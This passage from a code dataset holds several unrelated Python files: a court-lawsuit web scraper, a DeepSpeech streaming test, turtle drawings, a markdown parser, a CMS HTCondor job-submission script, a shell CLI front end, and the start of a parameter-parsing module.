get_lawsuit(cnj):\n\tprint('Fazendo requisicao do processo')\n\turl = 'http://www.tjpi.jus.br/e-tjpi/consulta_processo.php'\n\tparams = get_params(cnj)\n\tresponse = requests.get(url,params=params,verify=False)\n\t#precisa colocar o verify nesse caso pq a url so eh http e nao https\n\tlawsuit = parser(response.content)\n\t\n\treturn lawsuit\n\ndef parser(data):\n\tprint('Filtrando as informacoes')\n\tparsed = BeautifulSoup(data,'html.parser')\n\ttext = parsed.text\n\tlawsuit = {\n\t'number': get_number(text),\n\t'nature': get_element(parsed,'Natureza'),\n\t'reporter': get_element(parsed,'Relator'),\n\t'value': get_element(parsed, 'Valor da Causa'),\n\t'_class': get_element_list(parsed, 'Classe Processual'),\n\t'subject': get_element_list(parsed, 'Assuntos'),\n\t'activity_list': get_activity_list(parsed),\n\t'get_people': get_people(parsed)\n\t}\n\t\n\treturn lawsuit\n\ndef get_number(data):\n\tprint('Extraindo o numero do processo')\n\n\tresult = re.search(r'\\d{7}-\\d{2}.\\d{4}.\\d.\\d{2}.\\d{4}',data)\n\tif result: \n\t\treturn result.group()\t\n\ndef get_element(data,field):\n\thead = data.find('dt',text=field)\n\tnext_element = head.find_next_sibling()\n\n\treturn next_element.text \n\ndef get_element_list(data,field):\n\telement = get_element(data,field)\n\t\n\treturn element.split('>')\n\ndef get_activity_list(data):\n\tactivity_list = []\n\tactivity_table = data.find('div',id='movimentacoes')\t\n\tactivity_tbody = activity_table.find('tbody')\n\ttrs = activity_tbody.find_all('tr')\n\tfor tr in trs:\n\t\ttds = tr.find_all('td')\n\t\tdate_role = normalize_text(tds[1].text)\n\t\tdate = extract_by_regex(re.compile(r'(\\d{2}/\\d{2}/\\d{2,4})'), date_role)\n\t\tactivity = {\n\t\t'date': date,\n\t\t'text': normalize_text(tds[2].text)\n\t\t}\n\t\tactivity_list.append(activity)\n\t\n\treturn\tactivity_list\n\ndef normalize_text(text):\n\n\treturn text.replace('\\n','').replace('\\t','').strip()\n# sempre que for pegar os dados na html o parametro eh data,\n# quando for usar o regex, usa text\t\n\ndef get_people(data):\n\trelated_people = []\n\tpeople_table = data.find('div', id='partes')\n\tdls = people_table.find_all('dl')\n\tfor dl in dls:\n\t\tdts = dl.find_all('dt')\n\t\tfor dt in dts:\n\t\t\trole = dt.text\n\t\t\tparties = dt.findNext('ul')\n\t\t\tpeople = parties.find_all('li')\n\t\t\tfor li in people:\n\t\t\t\tperson = {\n\t\t\t\t'name': normalize_text(li.text),\n\t\t\t\t'role': role\n\t\t\t\t}\n\t\t\t\trelated_people.append(person)\n\tlawyers = get_lawyers(people_table)\n\trelated_people.extend(lawyers)\n# diferenca entre append e extend. 
append nao serve para listas, apenas unico item.\n\treturn related_people\n\ndef get_lawyers(data):\n\tlawyers = []\n\tlawyers_table = data.find_all('fieldset')[-1]\n\tlawyers_list = lawyers_table.find_all('li')\n\tfor li in lawyers_list:\n\t\tlawyer = {\n\t\t'name': normalize_text(li.text),\n\t\t'role': 'Advogado(a)'\n\t\t}\n\t\tlawyers.append(lawyer)\n\n\treturn lawyers\n\t\t\ndef extract_by_regex(regex,data):\n\n\tresult = regex.search(data)\n\tif result:\n\t\t\n\t\treturn result.group(1).strip()\t\n\n\nprint(get_lawsuit('0002508-53.2014.8.18.0000'))","repo_name":"maripnascimento/tjpi","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27306140932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport argparse\nimport numpy as np\nimport wave\n\nfrom deepspeech import Model\n\n\n# These constants control the beam search decoder\n\n# Beam width used in the CTC decoder when building candidate transcriptions\nBEAM_WIDTH = 500\n\n# The alpha hyperparameter of the CTC decoder. Language Model weight\nLM_ALPHA = 0.75\n\n# The beta hyperparameter of the CTC decoder. Word insertion bonus.\nLM_BETA = 1.85\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Running DeepSpeech inference.')\n parser.add_argument('--model', required=True,\n help='Path to the model (protocol buffer binary file)')\n parser.add_argument('--lm', nargs='?',\n help='Path to the language model binary file')\n parser.add_argument('--trie', nargs='?',\n help='Path to the language model trie file created with native_client/generate_trie')\n parser.add_argument('--audio1', required=True,\n help='First audio file to use in interleaved streams')\n parser.add_argument('--audio2', required=True,\n help='Second audio file to use in interleaved streams')\n args = parser.parse_args()\n\n ds = Model(args.model, BEAM_WIDTH)\n\n if args.lm and args.trie:\n ds.enableDecoderWithLM(args.lm, args.trie, LM_ALPHA, LM_BETA)\n\n fin = wave.open(args.audio1, 'rb')\n fs1 = fin.getframerate()\n audio1 = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n fin.close()\n\n fin = wave.open(args.audio2, 'rb')\n fs2 = fin.getframerate()\n audio2 = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n fin.close()\n\n stream1 = ds.createStream()\n stream2 = ds.createStream()\n\n splits1 = np.array_split(audio1, 10)\n splits2 = np.array_split(audio2, 10)\n\n for part1, part2 in zip(splits1, splits2):\n ds.feedAudioContent(stream1, part1)\n ds.feedAudioContent(stream2, part2)\n\n print(ds.finishStream(stream1))\n print(ds.finishStream(stream2))\n\nif __name__ == '__main__':\n main()\n","repo_name":"G-Slient/DeepSpeech-Speech-to-text","sub_path":"native_client/test/concurrent_streams.py","file_name":"concurrent_streams.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39496965376","text":"import turtle \n\n# turtle.tracer(0, 0)\n# turtle.update()\n\ncolors = ['orange', 'red', 'pink', 'yellow', 'blue', 'green']\nfor x in range(50):\n turtle.pencolor(colors[x % 6])\n turtle.width(x / 5 + 1)\n turtle.forward(x)\n turtle.left(20)\n \n\nstar = turtle.Turtle()\nstar.penup()\nstar.goto(-400, 0)\nstar.pendown()\n\nfor i in range(22):\n star.forward(50 + 90)\n star.right(144 + 90)\n \n\n\npolygon = 
turtle.Turtle()\npolygon.penup()\npolygon.goto(-100, 150)\npolygon.pendown()\n\nnum_sides = 6\nside_length = 160\nangle = 360.0 / num_sides \n\nfor i in range(num_sides):\n    polygon.forward(side_length)\n    polygon.right(angle)\n\n\nturtle.exitonclick()\nturtle.mainloop()","repo_name":"founek2/school-projects","sub_path":"Python/PSI-udp/example_turtle.py","file_name":"example_turtle.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"6369351687","text":"\"\"\" module to parse the markdown \"\"\" # add the module doc string\nimport re\n\n\ndef parse(markdown: str):\n    \"\"\" parse the markdown \"\"\" # add the function doc string\n    lines = markdown.splitlines() # change split('\\n') to splitlines()\n    res = ''\n    in_list = False\n    in_list_append = False\n    for i in lines:\n        if re.match('###### (.*)', i) is not None:\n            i = '<h6>' + i[7:] + '</h6>'\n        elif re.match('##### (.*)', i) is not None:\n            i = '<h5>' + i[6:] + '</h5>'\n        elif re.match('#### (.*)', i) is not None:\n            i = '<h4>' + i[5:] + '</h4>'\n        elif re.match('### (.*)', i) is not None:\n            i = '<h3>' + i[4:] + '</h3>'\n        elif re.match('## (.*)', i) is not None:\n            i = '<h2>' + i[3:] + '</h2>'\n        elif re.match('# (.*)', i) is not None:\n            i = '<h1>' + i[2:] + '</h1>'\n        mark = re.match(r'\\* (.*)', i)\n        if mark:\n            # wrap bold and italic markers inside the list item\n            curr = mark.group(1)\n            mark1 = re.match('(.*)__(.*)__(.*)', curr)\n            if mark1:\n                curr = mark1.group(1) + '<strong>' + \\\n                    mark1.group(2) + '</strong>' + mark1.group(3)\n            mark1 = re.match('(.*)_(.*)_(.*)', curr)\n            if mark1:\n                curr = mark1.group(1) + '<em>' + mark1.group(2) + \\\n                    '</em>' + mark1.group(3)\n            if not in_list:\n                in_list = True\n                i = '<ul><li>' + curr + '</li>'\n            else:\n                i = '<li>' + curr + '</li>'\n        else:\n            if in_list:\n                in_list_append = True\n                in_list = False\n\n        mark = re.match('<h|<ul|<p|<li', i)\n        if not mark:\n            i = '<p>' + i + '</p>'\n        mark = re.match('(.*)__(.*)__(.*)', i)\n        if mark:\n            i = mark.group(1) + '<strong>' + mark.group(2) + '</strong>' + mark.group(3)\n        mark = re.match('(.*)_(.*)_(.*)', i)\n        if mark:\n            i = mark.group(1) + '<em>' + mark.group(2) + '</em>' + mark.group(3)\n        if in_list_append:\n            i = '</ul>' + i\n            in_list_append = False\n        res += i\n    if in_list:\n        res += '</ul>'\n    return res\n","repo_name":"barbieri97/exercism","sub_path":"python/markdown/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"25865890721","text":"#!/usr/bin/env python3\n\n\"\"\"\nCalculate the edit distance between a map & the baseline map.\n\nFor example:\n\n$ scripts/calc_edit_distances.py\n$ scripts/calc_edit_distances.py -s NC -o ~/Downloads/NC/\n$ scripts/calc_edit_distances.py -s NC -o ~/Downloads/NC/ -c\n$ scripts/calc_edit_distances.py -s NC -o ~/Downloads/NC/ -c > intermediate/NC/NC_2022_Congress_edit_distances.txt\n\nFor documentation, type:\n\n$ scripts/calc_edit_distance.py -h\n\n\"\"\"\n\n\nimport argparse\nfrom argparse import ArgumentParser, Namespace\n\nimport os\nfrom operator import itemgetter\n\nfrom pg import *\n\n\ndef parse_args() -> Namespace:\n    parser: ArgumentParser = argparse.ArgumentParser(\n        description=\"Calculate the edit distance between a map & the baseline map.\"\n    )\n\n    parser.add_argument(\n        \"-s\",\n        \"--state\",\n        default=\"NC\",\n        help=\"The two-character state code (e.g., NC)\",\n        type=str,\n    )\n    parser.add_argument(\n        \"-o\",\n        \"--output\",\n        default=\"~/Downloads/NC/\",\n        help=\"Path to the output root\",\n        type=str,\n    )\n    parser.add_argument(\n        \"-c\", \"--header\", dest=\"header\", action=\"store_true\", help=\"Generate a header\"\n    )\n\n    parser.add_argument(\n        \"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\", help=\"Verbose mode\"\n    )\n\n    args: Namespace = parser.parse_args()\n    return args\n\n\ndef main() -> None:\n    \"\"\"Calculate the edit distance between a map & the baseline map.\"\"\"\n\n    args: Namespace = parse_args()\n\n    xx: str = args.state\n    output_dir: str = os.path.expanduser(args.output)\n    header: bool = args.header\n\n    verbose: bool = args.verbose\n\n    # Read the canonicalized baseline map\n\n    baseline_csv: str = f\"{xx}_{cycle}_{plan_type}_Baseline_canonical.csv\"\n    baseline_path: str = os.path.join(output_dir, baseline_csv)\n    baseline_blocks: list[dict] = read_csv(baseline_path, [str, int])\n\n    # Read the block-to-precinct mapping\n\n    unit: str = study_unit(xx)\n\n    block_precinct_csv: str = path_to_file([preprocessed_data_dir, xx]) + file_name(\n        [xx, cycle, \"block\", unit], \"_\", \"csv\"\n    )\n    block_precinct: list[dict] = read_csv(block_precinct_csv, [str, str])\n    precinct_by_block: dict[str, str] = {\n        row[\"BLOCK\"]: row[\"PRECINCT\"] for row in block_precinct\n    }\n\n    # Map block assignments to precinct assignments\n\n    baseline_assignments: dict[str, set[int]] = dict()\n\n    for row in baseline_blocks:\n        block: str = row[\"GEOID\"] if \"GEOID\" in row else row[\"GEOID20\"]\n        district: int = row[\"DISTRICT\"] if \"DISTRICT\" in row else row[\"District\"]\n\n        precinct: str = precinct_by_block[block]\n\n        if precinct not in baseline_assignments:\n            baseline_assignments[precinct] = set()\n\n        baseline_assignments[precinct].add(district)\n\n    #\n\n    compare_maps: list[str] = [\n        \"Official\",\n        \"Proportional\",\n        \"Competitive\",\n        \"Minority\",\n        \"Compact\",\n        \"Splitting\",\n    ]\n\n    edits: dict[str, int] = dict()\n    splits: dict[str, int] = dict()\n\n    for label in compare_maps:\n        # Read the canonicalized comparison map\n\n        compare_csv: str = (\n            f\"{xx}_{yyyy}_{plan_type}_{label}_canonical.csv\"\n            if label != \"Official\"\n            else f\"{xx}_{yyyy}_{plan_type}_Official.csv\"\n        )\n        compare_path: str = 
os.path.join(output_dir, compare_csv)\n compare_blocks: list[dict] = read_csv(compare_path, [str, int])\n\n # Map block assignments to precinct assignments\n\n compare_assignments: dict[str, set[int]] = dict()\n\n for row in compare_blocks:\n block: str = row[\"GEOID\"] if \"GEOID\" in row else row[\"GEOID20\"]\n district: int = row[\"DISTRICT\"] if \"DISTRICT\" in row else row[\"District\"]\n\n precinct: str = precinct_by_block[block]\n\n if precinct not in compare_assignments:\n compare_assignments[precinct] = set()\n\n compare_assignments[precinct].add(district)\n\n # Compare precinct assignments\n\n nedits: int = 0\n nsplits: int = 0\n\n for k, v in baseline_assignments.items():\n if k not in compare_assignments:\n print(f\"Precinct {k} not in {label}\")\n continue\n\n baseline_district: int = next(iter(v)) # No split precincts in baseline\n nsplits += 1 if len(compare_assignments[k]) > 1 else 0\n compare_assignments[k].discard(baseline_district)\n nedits += len(compare_assignments[k])\n\n edits[label] = nedits\n splits[label] = nsplits\n\n pass\n\n # Print the results\n\n if header:\n print(\n \"{0:^12}\".format(\"XX/precincts\"),\n \"{0:^12}\".format(\"Official\"),\n \"{0:^12}\".format(\"Proportional\"),\n \"{0:^12}\".format(\"Competitive\"),\n \"{0:^12}\".format(\"Minority\"),\n \"{0:^12}\".format(\"Compact\"),\n \"{0:^12}\".format(\"Splitting\"),\n )\n print(\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n )\n\n print(\n \"{0:>12}\".format(xx),\n \"{0:>12,}\".format(edits[\"Official\"]),\n \"{0:>12,}\".format(edits[\"Proportional\"]),\n \"{0:>12,}\".format(edits[\"Competitive\"]),\n \"{0:>12,}\".format(edits[\"Minority\"]),\n \"{0:>12,}\".format(edits[\"Compact\"]),\n \"{0:>12,}\".format(edits[\"Splitting\"]),\n \"edits\",\n )\n print(\n \"{0:>12,}\".format(len(baseline_assignments)),\n \"{0:>12,}\".format(splits[\"Official\"]),\n \"{0:>12,}\".format(splits[\"Proportional\"]),\n \"{0:>12,}\".format(splits[\"Competitive\"]),\n \"{0:>12,}\".format(splits[\"Minority\"]),\n \"{0:>12,}\".format(splits[\"Compact\"]),\n \"{0:>12,}\".format(splits[\"Splitting\"]),\n \"splits\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n\n### END ###\n","repo_name":"alecramsay/pg","sub_path":"scripts/calc_edit_distances.py","file_name":"calc_edit_distances.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8024452266","text":"import os, re\nimport argparse\nimport subprocess\nimport fileinput\nfrom tqdm import tqdm\nfrom datetime import datetime\n\n# Define global variables\nCMS_VER = \"CMSSW_10_2_13\"\nSCRAM_ARCH = \"slc7_amd64_gcc700\"\nEOS_PATH = \"/store/user/lpcjj/CaloScouting/rootTrees_reduced/\"\nCUT_FILE = \"config/cutFile_mainDijetCaloScoutingSelection.txt\"\n\ndef change_era_from_mainDijetAnalyzer(c_file_path, ERA, DIJET_ANALYZER):\n for line in fileinput.input(c_file_path, inplace=True):\n # Find the line with eraType and replace the value\n if 'std::string dataYear' in line:\n line = 'std::string dataYear = \"%s\";\\n' % (ERA)\n # Print modifies the file in-place\n print(line, end='')\n\n original_dir = os.getcwd()\n os.chdir(os.path.dirname(os.getcwd())) \n subprocess.run(['ln -sf %s src/analysisClass.C' % (DIJET_ANALYZER)], shell=True, check=True, 
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n    os.chdir(original_dir)\n\ndef change_JSON_path(CUT_FILE, GOLDEN_JSON):\n    for line in fileinput.input(\"../%s\" % (CUT_FILE), inplace=True):\n        if line.startswith(\"JSON\"):\n            line = \"JSON %s\\n\" % (GOLDEN_JSON)\n        # Print modifies the file in-place\n        print(line, end='')\n\n\ndef parse_config_file(config_path):\n    # Parse the config file\n    with open(config_path, 'r') as file:\n        lines = file.readlines()\n        dataset = lines[0].split('=')[1].strip()\n        dataset_type = dataset.split('/')[1]\n        year = dataset.split('/')[2].replace('-', '_')\n        year_just_number = re.findall(r'\\d+', year)[0]\n        if len(year_just_number) < 4: year_just_number = re.findall(r'\\d+', year)[1] ## For QCD\n        reco_type = dataset.split('/')[3]\n        input_list = lines[1].split('=')[1].strip()\n        interval = int(lines[2].split('=')[1].strip())\n        DIJET_ANALYZER = lines[3].split('=')[1].strip()\n        GOLDEN_JSON = lines[4].split('=')[1].strip()\n        ERA = lines[5].split('=')[1].strip()\n    return dataset_type, year, reco_type, input_list, interval, year_just_number, DIJET_ANALYZER, ERA, GOLDEN_JSON\n\n\ndef split_input_list(input_list, interval):\n    # Split the input list\n    with open(input_list, 'r') as file:\n        lines = file.readlines()\n    chunks = [lines[i:i + interval] for i in range(0, len(lines), interval)]\n    original_dir = os.getcwd()\n    os.chdir(os.path.dirname(os.getcwd()))\n    test_root = chunks[0][0].replace(\"\\n\", \"\")\n    print(\"Initiating 'make_rootNtupleClass.sh' script...\")\n    try:\n        subprocess.run('yes | ./scripts/make_rootNtupleClass.sh -f %s -t dijetscouting/events' % (test_root), shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n        print(\"\\033[92m The make_rootNtupleClass.sh has been successful!\\033[0m\")\n    except subprocess.CalledProcessError:\n        print(\"\\033[91m The make_rootNtupleClass.sh encountered an error and couldn't complete!\\033[0m\")\n\n\n\n    print(\"Initiating 'make' process...\")\n    try:\n        subprocess.run('make clean', shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n        subprocess.run('make', shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n        print(\"\\033[92m The 'make' process has been successful!\\033[0m\")\n    except subprocess.CalledProcessError:\n        print(\"\\033[91m The 'make' process encountered an error and couldn't complete!\\033[0m\")\n\n    os.chdir(original_dir)\n    return chunks, len(chunks)\n\n\ndef create_condor_folder(dataset_type, year, reco_type):\n    # Create condor folder\n    now = datetime.now()\n    date_time = now.strftime(\"%d%B%Y_%H\")\n    condor_folder = f\"cjobs_{dataset_type}_{year}_{reco_type}_{date_time}\"\n    os.makedirs(condor_folder, exist_ok=True)\n    return condor_folder, date_time\n\n\ndef create_sh_content(dataset_type, year, reco_type, date_time, i, list_file_path, year_just_number, test_root_file, DIJET_ANALYZER):\n    # Define variable for job name\n    job_name = \"{0}_{1}_Condor_n{2}\".format(dataset_type, year, i)\n    rootPrefix=\"root://cmseos.fnal.gov/\"\n\n    sh_content = \"\"\"#!/bin/tcsh\n\nsource /cvmfs/cms.cern.ch/cmsset_default.csh\ntar -xf {0}.tar.gz\nrm {0}.tar.gz\nexport SCRAM_ARCH={11}\ncd {0}/src\n\necho \"start renaming\"\nscramv1 b ProjectRename\n\necho \"next - setting eval\"\neval \`scramv1 runtime -csh\`\n\ncd CMSDIJET/DijetRootTreeAnalyzer\npwd\nls -lhtr\n\necho \"\"\necho \"Job Starting...\"\necho \"\"\n\nln -sf {10} src/analysisClass.C\n\nyes | ./scripts/make_rootNtupleClass.sh -f {9} -t dijetscouting/events\n\nmake clean\nmake\n\n./main {1} {2} 
dijetscouting/events {3} {3}\n\necho \"\"\necho \"Job END!\"\necho \"\"\n\nmkdir -p \"/eos/uscms/{4}/{8}/{5}/{5}_{6}\"\necho \"/eos/uscms/{4}/{8}/{5}/{5}_{6}\"\n\nxrdcp -f {3}_reduced_skim.root {7}/{4}/{8}/{5}/{5}_{6}/{3}_reduced_skim.root\nxrdcp -f {3}.root {7}/{4}/{8}/{5}/{5}_{6}/{3}.root\nxrdcp -f {3}.dat {7}/{4}/{8}/{5}/{5}_{6}/{3}.dat\n\necho \"\"\necho \"Starting cleanup...\"\necho \"\"\nls -lhtr\nrm {3}_reduced_skim.root\nrm {3}.root\nrm {3}.dat\n\necho \"\"\necho \"Remaining files after cleanup...\"\necho \"\"\nls -lhtr\n\necho \"DONE!\"\n\"\"\".format(CMS_VER, list_file_path, CUT_FILE, job_name, EOS_PATH, dataset_type, year, rootPrefix, year_just_number, test_root_file, DIJET_ANALYZER, SCRAM_ARCH)\n\n return sh_content\n\n\n\ndef create_jdl_content(dataset_type, year, reco_type, date_time, i, sh_file_path):\n # Get the full path for the Executable\n full_path = os.path.join(os.getcwd(), sh_file_path)\n\n jdl_content = \"\"\"universe = vanilla\nExecutable = {0}\nShould_Transfer_Files = YES\nWhenToTransferOutput = ON_EXIT_OR_EVICT\nTransfer_Input_Files = {1}.tar.gz, {2}\nOutput = cjob_$(Cluster)_$(Process).stdout\nError = cjob_$(Cluster)_$(Process).stderr\nLog = cjob_$(Cluster)_$(Process).log\n#Requirements = (Arch == \"x86_64\") && (OpSys == \"LINUX\") && (OpSysMajorVer == 7) && (OpSysAndVer == \"CentOS7\")\nstream_output = True\nstream_error = True\n+JobFlavour = \"nextweek\"\nQueue 1\"\"\".format(str(full_path), str(CMS_VER), str(sh_file_path))\n return jdl_content\n\n\n\ndef create_submit_all_script(total_files, condor_folder, dataset_type, year, reco_type):\n # Create the submit_all.py file\n submit_all_path = os.path.join(condor_folder, \"submit_all.py\")\n with open(submit_all_path, 'w') as file:\n file.write(\"#!/usr/bin/env python\\n\")\n file.write(\"import os\\n\")\n file.write(\"import subprocess\\n\")\n file.write(\"from tqdm import tqdm\\n\")\n file.write(\"\\n\")\n file.write(f\"with tqdm(total={total_files}, unit='job') as pbar:\\n\")\n file.write(f\" for i in range({total_files}):\\n\")\n file.write(f\" jdl_file_path = os.path.join('{dataset_type}_{year}_{reco_type}_n%d.jdl' % i)\\n\")\n file.write(\" os.system('condor_submit %s > cjob.txt' % (jdl_file_path)) \\n\")\n #file.write(\" proc = subprocess.Popen(['condor_submit', jdl_file_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', errors='replace')\\n\")\n #file.write(\" relevant_line = ''\\n\")\n #file.write(\" for line in iter(proc.stdout.readline, ''):\\n\")\n #file.write(\" relevant_line = line.strip().split('\\\\n')[-1]\\n\")\n #file.write(\" pbar.update(1 if relevant_line else 0)\\n\")\n file.write(\" pbar.update(1)\\n\")\n file.write(\"\\n\")\n\n # Change permissions of the submit_all.py file\n os.chmod(submit_all_path, 0o755)\n\n\n\ndef create_files(dataset_type, year, reco_type, date_time, condor_folder, chunks, year_just_number, DIJET_ANALYZER):\n # Create files\n os.makedirs(condor_folder, exist_ok=True)\n\n for i, chunk in enumerate(tqdm(chunks, unit='file')):\n list_file_name = f\"{dataset_type}_{year}_{reco_type}_n{i}.txt\"\n list_file_path = os.path.join('lists', dataset_type, f\"{dataset_type}_{year}_{reco_type}_{date_time}\", list_file_name)\n \n os.makedirs(os.path.dirname(os.path.join('../', list_file_path)), exist_ok=True)\n with open(os.path.join('../', list_file_path), 'w') as file:\n file.write(''.join(chunk))\n\n # Create .sh file\n sh_file_name = f\"{dataset_type}_{year}_{reco_type}_n{i}.csh\"\n sh_file_path = os.path.join(condor_folder, sh_file_name)\n with 
open(sh_file_path, 'w') as file:\n file.write(create_sh_content(dataset_type, year, reco_type, date_time, i, list_file_path, year_just_number, chunks[0][0].replace(\"\\n\", \"\"), DIJET_ANALYZER))\n os.chmod(sh_file_path, 0o755)\n\n # Create .jdl file\n jdl_file_name = f\"{dataset_type}_{year}_{reco_type}_n{i}.jdl\"\n jdl_file_path = os.path.join(condor_folder, jdl_file_name)\n with open(jdl_file_path, 'w') as file:\n file.write(create_jdl_content(dataset_type, year, reco_type, date_time, i, sh_file_path))\n\n\n print(\"Preparing the .tar.gz file. Please be patient!\")\n prev_dir = os.getcwd()\n # Execute tar command\n cmssw_base = os.path.dirname(os.getenv(\"CMSSW_BASE\"))\n os.chdir(cmssw_base) # Go to the CMSSW directory\n tar_command = \"tar --exclude-vcs -czf {0}.tar.gz --exclude=tmp --exclude=\\\"*root\\\" --exclude=\\\"*tar.gz\\\" -C {0}/.. {0}\".format(CMS_VER)\n os.system(tar_command)\n\n # Move tar file to condor_folder\n move_command = \"mv %s/%s.tar.gz %s/%s\" % (cmssw_base, CMS_VER, prev_dir, condor_folder)\n os.system(move_command)\n os.chdir(prev_dir)\n\ndef submit_jobs(condor_folder):\n print(\"Sending jobs to Condor. Please be patient!\")\n original_dir = os.getcwd()\n os.chdir(condor_folder)\n os.system(\"python3 submit_all.py\")\n os.chdir(original_dir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', help='Path to the configuration file', required=True)\n args = parser.parse_args()\n\n dataset_type, year, reco_type, input_list, interval, year_just_number, DIJET_ANALYZER, ERA, GOLDEN_JSON = parse_config_file(args.config)\n change_era_from_mainDijetAnalyzer(\"../src/%s\" % (DIJET_ANALYZER), ERA, DIJET_ANALYZER)\n change_JSON_path(CUT_FILE, GOLDEN_JSON)\n chunks, total_files = split_input_list(input_list, interval)\n condor_folder, date_time = create_condor_folder(dataset_type, year, reco_type)\n create_files(dataset_type, year, reco_type, date_time, condor_folder, chunks, year_just_number, DIJET_ANALYZER)\n create_submit_all_script(total_files, condor_folder, dataset_type, year, reco_type)\n submit_jobs(condor_folder)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"asimsek/CMSDijetCaloScoutingRun2","sub_path":"dijetCondor/condor_submit_Data.py","file_name":"condor_submit_Data.py","file_ext":"py","file_size_in_byte":10394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22034316587","text":"#!/usr/bin/python3\nimport sys\nfrom typing import Tuple\nfrom quo.completion import NestedCompleter\nfrom quo.history import MemoryHistory\nfrom quo.prompt import Prompt\nfrom quo.text import Text\n\nfrom mash.shell.shell import Shell, all_commands, run_command, main as shell_main\nfrom mash import io_util\nfrom mash.shell.base import ShellError\nfrom mash.doc_inference import infer_synopsis\n\nrprompt_init = 'Type any command to continue'\nrprompt_default = ''\nrprompt_error = 'Type `help` or ? 
for help'\n\n\ndef main(**shell_kwds):\n    shell = shell_main(repl=False, **shell_kwds)\n    session, shell = setup(shell)\n    run(session, shell)\n\n\ndef setup(shell: Shell) -> Tuple[Prompt, Shell]:\n    shell.ignore_invalid_syntax = False\n\n    # setup a completion-dropdown\n    completer = NestedCompleter.add({k: None for k in all_commands(shell)})\n\n    # setup a history-completion\n    for cmd in all_commands(shell):\n        MemoryHistory.append(cmd)\n\n    session = Prompt(\n        history=MemoryHistory,\n        suggest=\"history\",\n        rprompt=Text(rprompt_init),\n        enable_history_search=True,\n        completer=completer,\n        vi_mode=True,\n        bottom_toolbar=lambda: toolbar(shell)\n    )\n    return session, shell\n\n\ndef run(session: Prompt, shell: Shell):\n    io_util.interactive = True\n    print('Press ctrl-d to exit, ctrl-c to cancel, TAB for word completion, ? for help and ! for shell interop.')\n    while True:\n        step(session, shell)\n\n\ndef step(session, shell):\n    try:\n        cmd = session.prompt(shell.prompt)\n        try:\n            run_command(cmd, shell)\n            session.rprompt = Text(rprompt_default)\n        except ShellError as e:\n            print(e)\n            session.rprompt = Text(rprompt_error)\n    except KeyboardInterrupt:\n        pass\n    except EOFError:\n        sys.exit(1)\n\n\ndef toolbar(shell: Shell, text='Run any command to show info'):\n    method = shell.last_method()\n    if method:\n        text = generate_help(method)\n\n    return Text(text)\n\n\ndef generate_help(func):\n    synopsis = infer_synopsis(func)\n    full_text = synopsis\n    if func.__doc__:\n        full_text += f' | {func.__doc__}'\n\n    # keep the first few lines\n    return '\\n'.join(full_text.split('\\n')[:3])\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"voschezang/mash","sub_path":"src/mash/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"73090875769","text":"# Duta Kukuh Pribadi\r\n\r\nangka = None\r\n\r\nbilTotal = 0\r\n\r\nwhile angka != 0:\r\n    try:\r\n        angka = input(\"Enter a number : \")\r\n        angka = int(angka)\r\n\r\n    except ValueError:\r\n        print(\"Error: '\", angka, \"' is not a valid number. 
Please try again.\")\r\n\r\n else : \r\n if angka % 2 == 0:\r\n bilTotal += angka*angka\r\n\r\nprint(\"The sum of the squares of the even numbers is:\" , bilTotal)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"olober76/Python-Learning","sub_path":"Tugas/tugas1.py","file_name":"tugas1.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29418277808","text":"# JT 2017-19\n\nfrom __future__ import division\nfrom importlib import import_module\nfrom six import string_types\nfrom copy import deepcopy\nfrom collections import OrderedDict as odict\nimport numpy as np\n\n# Conventions\n_label = \"label\"\n_prior = \"prior\"\n_theory = \"theory\"\n_params = \"params\"\n_likelihood = \"likelihood\"\n_sampler = \"sampler\"\n_p_label = \"latex\"\n_p_dist = \"dist\"\n_p_value = \"value\"\n_p_derived = \"derived\"\n_p_renames = \"renames\"\n_separator = \"__\"\n_separator_files = \".\"\n_minuslogprior = \"minuslogprior\"\n_prior_1d_name = \"0\"\n_chi2 = \"chi2\"\n_weight = \"weight\"\n_minuslogpost = \"minuslogpost\"\n_post = \"post\"\n\n\ndef get_info_params(info):\n \"\"\"\n Extracts parameter info from the new yaml format.\n \"\"\"\n # Prune fixed parameters\n info_params = info.get(_params)\n info_params_full = odict()\n for p, 